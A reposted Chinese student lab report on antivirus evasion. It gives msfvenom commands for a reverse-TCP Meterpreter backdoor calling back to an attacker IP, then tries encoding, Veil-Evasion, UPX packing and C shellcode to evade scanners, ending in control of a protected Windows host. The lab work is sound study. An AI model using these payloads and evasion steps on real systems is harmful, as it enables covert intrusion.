博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20155307《网络对抗》免杀原理与实践
阅读量:4983 次
发布时间:2019-06-12

本文共 1028 字,大约阅读时间需要 3 分钟。

老师留的问答题

  • 杀软是如何检测出恶意代码的?

    1.通过行为检测

    2.通过特征码的比对

  • 免杀是做什么?

    使得恶意软件躲避杀毒软件的检查

  • 免杀的基本方法有哪些?

    修改特征码和改变行为特征

实验主要过程

  • 1、免杀效果参考基准。Kali使用上次实验msfvenom产生后门的可执行文件,刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址进行扫描,有48%的杀软报告病毒。

    1074394-20180410225822938-876378219.jpg
  • 2、使用msf编码器 编码一次,Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.124 LPORT=5307 -f exe >liuhao.exe

    1074394-20180410225905538-811148725.jpg
    理论上会降低被查出率,但实际上并没有什么变化。网站监测结果还是51%的杀软报告病毒,
    1074394-20180410230056690-387087425.jpg
    显示回连成功
    1074394-20180410230309824-1945755533.png
  • 3、多次编码 Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.124 LPORT=5307 -f exe > liuhao.exe

    1074394-20180410230343425-1315825811.jpg
    多次编码依旧没有任何作用,被电脑管家查杀,恢复后放入网站检查
    1074394-20180410230441362-1598025338.jpg
    尝试回连,发现录音功能成功
    1074394-20180410230735310-145281571.png
  • 4、使用Veil-Evasion重新编写源代码

    在Kali的终端中启动Veil-Evasion命令行中输入veil,后在veil中输入命令use evasion依次输入如下命令生成你的可执行文件:use python/meterpreter/rev_tcp.py
    1074394-20180410230807604-1501123802.jpg
    放入网站检查
    1074394-20180410231030858-1250293876.jpg
    1074394-20180410231422520-225256034.png
  • 5、UPX加壳尝试 命令upx 5307.exe -o 53071.exe

    1074394-20180410231445786-411314461.jpg
    百分之48的数据说明upx加壳没什么用,
    1074394-20180410231528778-859648335.jpg
  • 6、C语言调用Shellcode 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。

    1074394-20180410231550732-1799512710.jpg
    VS编译运行产生exe文件
    1074394-20180410232420671-88948824.jpg
    只有百分之十二的杀软报告发现病毒,免杀效果还不错
    1074394-20180410232639758-962433927.png
    按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装腾讯电脑管家 )的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限

转载于:https://www.cnblogs.com/zhuanyedajiesanshinian/p/8784559.html

你可能感兴趣的文章
主动与被动监控 拓扑图组合图 自定义监控
查看>>
SQL总结(一)基本查询
查看>>
PDF分割--可脱离python环境执行,可传参数,可弹窗的PC端小工具
查看>>
cas-client-core单点登录排除不需要拦截的URL
查看>>
OCR技术浅探 : 文字定位和文本切割(2)
查看>>
jmeter集合点
查看>>
Java类代码块执行顺序
查看>>
克鲁斯卡尔(模板题)
查看>>
汉字转拼音
查看>>
Python中Web框架编写学习心得
查看>>
dataTable/dataSet转换成Json格式
查看>>
asp.net core模块学习
查看>>
MySQL远程连接不上的解决方法
查看>>
如何使用JMeter从文件中提取数据
查看>>
AndroidBase基础类文档
查看>>
使用delphi 开发多层应用(十九) ios通过soap 访问kbmmw服务器
查看>>
三大特征 封装 继承 多态
查看>>
Python 3 函数分类
查看>>
通过.frm表结构和.ibd文件恢复数据
查看>>
R语言之——字符串处理函数
查看>>